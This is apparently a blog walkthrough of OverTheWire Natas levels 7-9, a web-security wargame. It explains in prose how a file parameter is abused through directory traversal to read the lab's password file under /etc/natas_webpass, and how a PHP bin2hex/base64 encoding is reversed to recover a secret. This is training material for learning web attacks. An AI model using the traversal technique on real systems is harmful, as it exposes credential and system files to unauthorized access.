OVERTHEWIRE Natas: Walkthrough series Level 7 – 9

This article is a walkthrough for level 7 – 9 of overthewire Natas Web Attack Series. Visit the links below for the levels before these.

Overthewire Natas: Walkthrough Series Levels 1 – 4

 

Overthewire Natas: Walkthrough Series Levels 4 -7

 

Let’s get on with it:

Level 7 – 8:

After logging in with the password we found in the last article. We are given with this screen.

overthewire natas7-83

A quick view on the Source code will tell you hint that the password file exist on the path /etc/natas_webpass/natas8. 

overthewire natas7-82

This challenge shows the web application attack called Directory traversal.  
Look at the URL I have written, the page variable here takes a file and output it on the browser page. So, We can take the file /etc/natas_webpass/natas8. Here is the password for level 8:

overthewire natas7-83

LEVEL 8 – 9

Login with the password you found.
This is the screen that will appear.

overthewire natas8-90
Click on “View Source code” to see what is happening actually.
overthewire natas

See the code I have marked in red. The code is PHP code and there is a variable called $encodedSecret which carries a value.
The function encodeSecret takes the parameter of userinput and encode it in base64 then reverse it and then encode it to bin2hex.

The if condition checks if the encoded secret entered by user matches the $encodedSecret variable value. If yes it will give out the password for the next level.

So you copy the $encode secret variable and use an online bin2hex decoder to decode it to reverse base64 string.

overthewire natas8-908-92 I used another online tool to reverse the above base64 string produced.
overthewire natas8-908-92

Finally, The base64 string that is obtained above will be decoded using online base64 decoders, and below is the string that will be the output of decoded string, which is the actual secret.

overthewire natas8-908-92

Hence, the password is obtained:

 

overthewire natas

This series will continue in the next article. We will be looking at next levels in the next post. I will share the link here, once its done.

 

 

 

 

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.